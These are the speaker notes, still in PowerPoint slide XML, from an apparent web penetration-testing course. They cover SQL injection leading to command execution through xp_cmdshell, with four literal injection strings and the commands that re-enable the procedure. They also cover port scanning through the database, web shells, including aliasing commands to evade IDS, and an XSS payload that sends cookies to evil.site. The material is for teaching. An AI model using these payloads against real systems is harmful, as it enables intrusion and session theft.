              <a:latin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PostGRES can read data from the file system using the Copy from syntax.  Typically an attacker would create the table first, then insert the data they were interested in.  After selecting the table using another query, they would drop the temporary table.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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23142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 will now explore ways to interact with the OS on the DB server.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23142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41A313EE-9ACF-3547-97F4-BAF2D9995176}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="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0984EDF-AB51-C14C-B464-769139B3C4CB}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin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 well-known default stored procedure is "xp_cmdshell." This allows us to use MSSQL server to run operating system commands.  The results are not displayed, so in the next slide we will discuss how to retrieve the results.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BE5C9D4-F8D4-F34C-AD5C-8B7FC54465EC}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>This example prints the local route table and then retrieves it.  As attackers, this would provide us with important internal network information.  We can then use this information to for further attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>We need to run four queries.  The injections would be:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>First injection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'; exec master.xp_cmdshell  'route print &gt; results.txt' --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Second injection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'; Create TABLE results (outp varchar(5000)); --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Third injection:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>'; BULK INSERT results FROM 'results.txt' with (rowterminator = "\n\n\n\n"); --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Fourth injection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>' and 1 in (select outp from results) --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs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5E3E25F-E91D-144E-AFF4-31592C96204F}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin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By default, Microsoft has started disabling xp_cmdshell.  This started in the 2005 version of Microsoft SQL Server.  But if you have the correct permissions, you are able to re-enable the stored procedure, since it exists.  These four commands will set this up for you:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>EXEC sp_configure 'show advanced options', 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>RECONFIGURE;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>EXEC sp_configure 'xp_cmdshell', 1;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>RECONFIGURE;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BCCECEC-B80D-EC4D-8AF7-2AE196CA9E49}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin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PostGRES uses the system function during queries to execute system commands.  These commands are limited to what the PostGRES user has permission to run.  As with previous command execution, the results are not displayed to the screen and need to be retrieved in another fashion.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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24269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Now we will explore port scanning using MSSQL.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24269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073554C-35F6-774B-ADA8-01AF31F33CC1}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="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16D22C8-A9A0-1F45-91EB-0B2809FF7B72}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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One of the more interesting features of MS SQL is using the database to port scan a network.  This uses the ability within SQL Server to open a query to a remote database server.  By controlling this query, the attacker is able to determine which ports are open on which machines.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B360C1D-4F8B-114C-8E33-995145270118}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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example will try to connect to 10.5.42.1 on port 80.  If the error "SQL Server does not exist or access denied" is returned, the port is closed.  If "OLE DB provider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'sqloledb' reported an error" is returned, then the port is open and available for further attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic"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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24576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next attack is file injection using SQL injection.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24576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F110DA45-2ADE-D843-BD9B-72D5643292EF}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200"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58559A6-BBBC-F645-BC90-32BD2EA8745F}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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Now we are going to explore the last step of the attack process, exploitation. We will build on the information we have discovered in the last three steps and expand the foothold we have in the application.  Today we will explore some of the more advanced attacks possible through a web site.  Enjoy!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018B9B8-B072-A74D-A2CA-6C6BA2FF7B8A}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin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One of the nice parts of SQL is that we can perform queries where we control the contents of the results.  For example if we select a string from a table, the resulting record set is that string.  If we make use of this and write the result to a file, we are able to create scripts and applications onto the DB server.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E75E2538-D65D-2345-8481-A075C68C3418}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>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Two different methods can be used if you are able to write to a file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The first is to create a script.  This script would be different based on the OS.  For example you would use BASH scripts for Linux and VBS scripts for Windows.  These scripts would then be called using further SQL injection attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The second is to work with the web server that is installed on so many of the database servers today.  By writing a file to the web root, the file can then be called using a simple web browser.  If the database server is not accessible via a web browser from where you are located, using XSS to hook a client within the target network would provide you this access.  More on hooking browsers later today.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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24883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this next section we are going to explore some of the pre-written injection files and how they work.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24883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636ABB8-296D-E84D-B2E5-3FBE9454E774}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="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EFFE9A1-21D1-B641-B5B8-EBAD8B4D653F}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>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Instead of building files to perform various functions, let's just use web applications built for this purpose.  There are as many as you can possibly imagine available, but since shell access is golden, let's go there.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We are going to look at two different pre-built web shells: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>	phpshell and ajaxshell</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3AFC4A3-F8C7-584A-AFE6-3A30C6A27170}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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PHPshell is available at phpshell.sourceforge.net.  It is a simple script that was originally designed to assist in managing servers.  While it is more complex to inject since it is made up of two files, it has a feature that makes it quite nice.  The config.php file includes the ability to alias commands.  This enables you to bypass IDS devices that look for commands such as "id" or similar.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As you can see from the screen shot above, once you are logged in, the application is simple to use.  It presents you with a large text area where commands are entered.  After either pressing enter or clicking the execute button, the command runs.  Results from the command are then echoed to the screen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic"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F053D309-771D-5D43-894C-886362F06A91}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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AJAXshell is a much more powerful shell.  It is a single file that can be uploaded to a server and has many built in features.  While it can accomplish the basic things such as running commands.  It also includes a pretty powerful file browser and upload functionality.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As you can see from the screenshot above, AJAXShell has adopted the "L33T" black look and feel.  The menu across the top of the screen gives you most of the access you need.  While the menu along the left side provides access to macro functions such as gathering server info and reading /etc/passwd.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic"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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25293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Laudanum is a collection of these files.  It was originally released at DefCon 17 in 2009 and the team writing it has grown beyond the original members.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Laudanum is attempting to include many different functions in one package.  These range from shells to utilities like DNS lookups and mounting shares to proxying network requests.  These are written to support web scripting languages such as ASP, ColdFusion, PHP and Java.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The real differentiator between Laudanum and other packages is the scope limiting features.  All of the scripts include some form of authorization.  This may be a user name and password or restrictions based on IP addresses.  If your client is not authorized, you receive a 404 status code to prevent attackers from detecting the existence of the file.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25293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8CF3D4C-64F0-6D49-9803-9A9EEF12DDFA}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23654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 are now going to explore sqlmap, a tool we discussed on day three.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23654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DA3DACA-C7B2-1946-B18C-51F5BB0E2929}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="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ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25805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discuss blind SQL injection.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25805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EEE73881-2986-0748-814B-99F7774DE947}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="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DC0BE37-2735-6B45-B3AE-72E8B4523E27}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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Blind SQL injection is similar to SQL Injection, except that the results are not displayed. Without the error messages, it takes more effort to get working attacks.  Since the display is intercepted by the application, the attacker must run commands that either do not require visible results, such as adding a user, or the results must be sent to the attacker using some functionality within the database.  One example of this is "UTL_MAIL" in Oracle.  This is a stored procedure that will send e-mail from the database.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B14E70F-3FD9-D942-AA0C-05D114B834D0}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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As a review, over the last three steps we have performed reconnaissance to plan our attack. Gained information on how the application was put together and discovered various vulnerabilities.  This is the foundation we take into today.</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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26009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next attack is file injection using a combination of SQL injection and blind SQL injection.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26010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A4893FA-99D1-8A41-AA61-D0C73499DB5B}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26829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topic is cross site scripting.  This is actually where we will spend quite a bit of time today since XSS can be one of the more powerful attacks to perform.  It is also one of the more common ones to find due to most people misunderstanding what it can accomplish.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26829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EED07C8-1A8C-BF44-9299-CA9BFE76ACC9}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="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D85089D-F762-2540-BF60-71028A80C420}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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Cross Site Scripting (XSS) was originally called "script injection," which is an appropriate name. It simply means that an attacker has the ability to inject a script and have the browser run it. It does not require the involvement of multiple web sites, as the name implies. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>There are two types of XSS which we will discuss: persistent and reflective. There is also a third type of Cross Site Scripting, but it has nothing to do with web applications. For your information, it is called "Local DOM-based" XSS. This is when you attack a non-web application client using JavaScript.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72226C2-FF0A-AF49-AD51-0DBB6CC00551}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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xfrm>
            <a:off x="838200" y="4606925"/>
            <a:ext cx="5638800" cy="4384675"/>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When the GET method is used, all of the parameters are conveniently submitted in the URL. With a POST request, the variables are in the payload of the request. POST requests are still vulnerable to XSS, but attacks are harder to demonstrate because we have to configure a client to send the HTTP POST and build the payload. It is not very easy to include POST payloads in a report and have a reader execute it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Alternatively, there is a tool available from Secure Ideas.  This file is available from http://www.secureideas.net/tools and we can install it onto a server we control.</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B55B864-F0D8-8C44-BBDB-28C4DCF2527C}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin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Some of the typical exploits used with XSS are reading cookies and redirecting a user to another page.  You are also able to modify the content of a page and run pretty much any custom code within the JavaScript language.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4BCE1333-DCFD-6D4D-9B03-8451C08D8568}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial"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Cookies hold valuable information about a user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s session. This could include the session ID or session token, as we discussed on Day 1, or sensitive information that an application has incorrectly stored on a client. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The code in this slide is designed to steal cookie information from a client and send it to an attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s web site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>You will notice that the script includes an image tag, which is written to the screen within the targeted application. The image tag sets the source of the image to an evil site, and appends the value of the cookie to the URL. If the value of the cookie was a session ID– for example, 42– then the URL would become: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>http://evil.site/42 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>At that point, the user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s browser automatically attempts to load the image. The image will fail to load (it could appear as a red X, but if the pixel size is set to 1x1, the user won't see it at all). This request will appear in the evil.site logs. The evil.site administrator will find a "404" error message, which contains the value of the cookie as part of the requested address.  Then, all the evil site administrator needs to do is parse the site logs to get the cookies. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The upshot is that this script causes a user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s data to be transmitted to the evil site via HTTP requests. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic"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C3E4076-F252-4844-9481-46EEACFBD37C}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>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above code, written by Tom Liston, would run on a server controlled by the attacker.  It reads the cookie value from the request and logs them to /tmp/cookiedump.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This code could be updated to log further information or even make a web request using the cookies stolen.  The web request would go to the site in the referer header. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:sym typeface="Wingdings" charset="0"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
